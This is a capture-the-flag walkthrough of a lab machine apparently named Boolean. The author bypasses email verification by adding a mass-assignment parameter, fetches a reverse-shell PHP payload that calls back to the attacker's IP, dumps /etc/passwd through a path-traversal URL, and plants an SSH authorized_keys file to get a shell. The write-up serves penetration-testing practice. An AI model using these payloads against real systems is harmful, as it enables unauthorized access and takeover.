http

Looking at page:

At port 80, I found login page and here admin:admin credentail didn't work and also SQLi basic payload didn't gave any error.

At port 33017

It says this port is reversed for future development.

Hidden directory

Port 80:

feroxbuster --url http://$boolean --filter-status 404

We can see there is register directory. This means we can register our self.

Registering

Username: redhunter
Email: [email protected]
Password: Cool@123

Now try to login.

I tried. It is asking for email verification. Let me test using temp mail.

Temp Mail - Disposable Temporary EmailTemp Mail

No email was received.

Analysing the website data in the burp suite [Worked]

I will recreate a user and capture the data in the burp suite.

username: test
email: [email protected]
password: test

You will get the confirmation that your account has been created.

Now let's try to login.

Just click on the email change button and then submit the same email id and then see the there is one felid named as Confirmed: false You will see this in response felid. Send this request to the repeater.

_method=patch&authenticity_token=k8SDAPlufzAy-YZ65fnYrUsaIxGvIFY_r9Uk7PJlJALcSDKNEqo8IXi-YenGnPcRBotjE6PoYBlj7h8RkInBxQ&user%5Bemail%5D=test%40gmail.com&user[confirmed]=true&commit=Change%20email

Let's try adding user[confirmed]=true in the request field and see if we can bypass this. I have add user[confirmed] in this way because the email id in the request is mentioned in the same way.

Value changed.

This means account is verified. Let's login to the account in browser.

We got the filemanager after login. This means our account got verified successfully.

Getting shell.

I can see that website is using ruby as a technology stack.

Let's try if we can get the shell using php file.

wget "https://www.revshells.com/PHP%20PentestMonkey?ip=192.168.45.190&port=80&shell=%2Fbin%2Fsh&encoding=%2Fbin%2Fsh" -O shell.php

Now upload it file manager.

It got uploaded successfully.

When I click on the uploaded file. It gets downloaded. Also, url chagnges to this.

http://192.168.183.231/?cwd=&file=shell.php&download=true

I am also unable to access the page directory on port 80 as well as on port 33017.

Let's test for Cross-Site Scripting.

http://192.168.183.231/?cwd=../../../../../../../../etc&file=passwd&download=true

This lead to download of Passwd file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
remi:x:1000:1000::/home/remi:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false

I can see there is two user.

remi
root

Generaly, Root don't have ssh file. Let's check for remi first.

http://192.168.183.231/?cwd=../../../../../../../../home/remi/.ssh&file=id_rsa&download=true

http://192.168.183.231/?cwd=../../../../../../../../home/remi/.ssh&file=authorized_keys&download=true

Both didn't work.

http://192.168.183.231/?cwd=../../../../../../../../root/.ssh&file=id_rsa&download=true

None of the above method worked.

Let's try to add our own SSH-KEY.

We will change directory to ssh by visiting below url.

http://192.168.183.231/?cwd=../../../../../../../../../home/remi&file=.ssh&download=true

This worked.

Then click on .ssh and then on keys. You will be navigated to below direcotyr and its content looks like this.

I will click on root and this root file will be downloaded. I found that this is SSH file.

I will try connecting to the root user using this.

mv ~/Downloads/root root
chmod 600 root
ssh root@$boolean -i root

It is asking for a password. But currently, I don't have it so, I will try to crack it.

SSH Private key cracking | Tools | Tips To Securehacking.tipstosecure.com

It says Key doesn't have password. Let's try another file for connecting to remi.

Same issue for this.

Uploading Own ssh key.

We will upload our own SSH key.

First we will make ssh key.

ssh-keygen

We make a ssh file. Two file will be created one is named as id_rsa and id_rsa.pub.

We will rename file id_rsa.pub to authorized_keys.

mv id_rsa.pub authorized_keys

Now place this file in ssh directory. Change directory by visiting below link.

http://192.168.183.231/?cwd=../../../../../../../../../home/remi/.ssh

Uplaod file here.

Now connect using private key.

ssh -i id_rsa remi@$boolean

Got shell.

PreviousBoolean [Intermediate]Nextprivilege escalation

Last updated 12 months ago

Was this helpful?

hashtagLooking at page:

hashtagHidden directory

hashtagPort 80:

hashtagRegistering

hashtagAnalysing the website data in the burp suite [Worked]

hashtagGetting shell.

hashtagUploading Own ssh key.